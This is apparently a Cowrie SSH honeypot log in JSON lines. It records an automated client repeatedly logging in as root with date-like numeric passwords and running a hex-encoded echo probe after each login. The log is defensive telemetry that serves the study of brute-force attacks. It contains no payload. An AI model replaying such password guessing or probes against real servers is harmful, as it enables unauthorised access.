{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.754329Z","src_ip":"212.227.125.160","session":"d0f347a35f8d"}
{"eventid":"cowrie.login.success","username":"root","password":"191287","message":"login attempt [root/191287] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.882342Z","src_ip":"212.227.125.160","session":"d0f347a35f8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:30.947822Z","src_ip":"212.227.125.160","session":"d0f347a35f8d"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.948524Z","src_ip":"212.227.125.160","session":"d0f347a35f8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.988913Z","src_ip":"212.227.125.160","session":"d0f347a35f8d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.990309Z","src_ip":"212.227.125.160","session":"d0f347a35f8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53846,"dst_ip":"1.2.3.4","dst_port":22,"session":"492841280a26","protocol":"ssh","message":"New connection: 212.227.125.160:53846 (1.2.3.4:22) [session: 492841280a26]","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.018809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.071449Z","src_ip":"212.227.125.160","session":"492841280a26"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.072460Z","src_ip":"212.227.125.160","session":"492841280a26"}
{"eventid":"cowrie.login.success","username":"root","password":"191282","message":"login attempt [root/191282] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.284997Z","src_ip":"212.227.125.160","session":"492841280a26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:31.439378Z","src_ip":"212.227.125.160","session":"492841280a26"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.440334Z","src_ip":"212.227.125.160","session":"492841280a26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.469401Z","src_ip":"212.227.125.160","session":"492841280a26"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.470515Z","src_ip":"212.227.125.160","session":"492841280a26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53856,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b10b10fd9d7","protocol":"ssh","message":"New connection: 212.227.125.160:53856 (1.2.3.4:22) [session: 5b10b10fd9d7]","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.491546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.492395Z","src_ip":"212.227.125.160","session":"5b10b10fd9d7"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.527647Z","src_ip":"212.227.125.160","session":"5b10b10fd9d7"}
{"eventid":"cowrie.login.success","username":"root","password":"190783","message":"login attempt [root/190783] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.601392Z","src_ip":"212.227.125.160","session":"5b10b10fd9d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:31.724106Z","src_ip":"212.227.125.160","session":"5b10b10fd9d7"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.724898Z","src_ip":"212.227.125.160","session":"5b10b10fd9d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.749189Z","src_ip":"212.227.125.160","session":"5b10b10fd9d7"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.750178Z","src_ip":"212.227.125.160","session":"5b10b10fd9d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53872,"dst_ip":"1.2.3.4","dst_port":22,"session":"60cdf4cf105f","protocol":"ssh","message":"New connection: 212.227.125.160:53872 (1.2.3.4:22) [session: 60cdf4cf105f]","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.770911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.771639Z","src_ip":"212.227.125.160","session":"60cdf4cf105f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.794436Z","src_ip":"212.227.125.160","session":"60cdf4cf105f"}
{"eventid":"cowrie.login.success","username":"root","password":"190285","message":"login attempt [root/190285] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:31.924194Z","src_ip":"212.227.125.160","session":"60cdf4cf105f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:32.013053Z","src_ip":"212.227.125.160","session":"60cdf4cf105f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.013968Z","src_ip":"212.227.125.160","session":"60cdf4cf105f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.041395Z","src_ip":"212.227.125.160","session":"60cdf4cf105f"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.042700Z","src_ip":"212.227.125.160","session":"60cdf4cf105f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53884,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbe1462755ef","protocol":"ssh","message":"New connection: 212.227.125.160:53884 (1.2.3.4:22) [session: dbe1462755ef]","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.062936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.077555Z","src_ip":"212.227.125.160","session":"dbe1462755ef"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.105720Z","src_ip":"212.227.125.160","session":"dbe1462755ef"}
{"eventid":"cowrie.login.success","username":"root","password":"181287","message":"login attempt [root/181287] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.347409Z","src_ip":"212.227.125.160","session":"dbe1462755ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:32.492533Z","src_ip":"212.227.125.160","session":"dbe1462755ef"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.493353Z","src_ip":"212.227.125.160","session":"dbe1462755ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.550993Z","src_ip":"212.227.125.160","session":"dbe1462755ef"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.552140Z","src_ip":"212.227.125.160","session":"dbe1462755ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53890,"dst_ip":"1.2.3.4","dst_port":22,"session":"01567803b9a0","protocol":"ssh","message":"New connection: 212.227.125.160:53890 (1.2.3.4:22) [session: 01567803b9a0]","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.593787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.601209Z","src_ip":"212.227.125.160","session":"01567803b9a0"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.626577Z","src_ip":"212.227.125.160","session":"01567803b9a0"}
{"eventid":"cowrie.login.success","username":"root","password":"181285","message":"login attempt [root/181285] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.765085Z","src_ip":"212.227.125.160","session":"01567803b9a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:32.881956Z","src_ip":"212.227.125.160","session":"01567803b9a0"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.882653Z","src_ip":"212.227.125.160","session":"01567803b9a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.906386Z","src_ip":"212.227.125.160","session":"01567803b9a0"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.907517Z","src_ip":"212.227.125.160","session":"01567803b9a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53902,"dst_ip":"1.2.3.4","dst_port":22,"session":"9565c962d7f0","protocol":"ssh","message":"New connection: 212.227.125.160:53902 (1.2.3.4:22) [session: 9565c962d7f0]","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.928662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.929349Z","src_ip":"212.227.125.160","session":"9565c962d7f0"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:32.953598Z","src_ip":"212.227.125.160","session":"9565c962d7f0"}
{"eventid":"cowrie.login.success","username":"root","password":"18101989","message":"login attempt [root/18101989] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.084417Z","src_ip":"212.227.125.160","session":"9565c962d7f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:33.206253Z","src_ip":"212.227.125.160","session":"9565c962d7f0"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.206977Z","src_ip":"212.227.125.160","session":"9565c962d7f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.262203Z","src_ip":"212.227.125.160","session":"9565c962d7f0"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.263298Z","src_ip":"212.227.125.160","session":"9565c962d7f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53914,"dst_ip":"1.2.3.4","dst_port":22,"session":"93a4c3aa59b7","protocol":"ssh","message":"New connection: 212.227.125.160:53914 (1.2.3.4:22) [session: 93a4c3aa59b7]","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.284287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.301321Z","src_ip":"212.227.125.160","session":"93a4c3aa59b7"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.350771Z","src_ip":"212.227.125.160","session":"93a4c3aa59b7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36128,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb80f625eae4","protocol":"ssh","message":"New connection: 196.251.86.249:36128 (1.2.3.4:22) [session: bb80f625eae4]","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.364319Z"}
{"eventid":"cowrie.login.success","username":"root","password":"180889","message":"login attempt [root/180889] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.449476Z","src_ip":"212.227.125.160","session":"93a4c3aa59b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:33.568815Z","src_ip":"212.227.125.160","session":"93a4c3aa59b7"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.569524Z","src_ip":"212.227.125.160","session":"93a4c3aa59b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.596714Z","src_ip":"212.227.125.160","session":"93a4c3aa59b7"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.597560Z","src_ip":"212.227.125.160","session":"93a4c3aa59b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53924,"dst_ip":"1.2.3.4","dst_port":22,"session":"527f304c0fcf","protocol":"ssh","message":"New connection: 212.227.125.160:53924 (1.2.3.4:22) [session: 527f304c0fcf]","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.618776Z"}
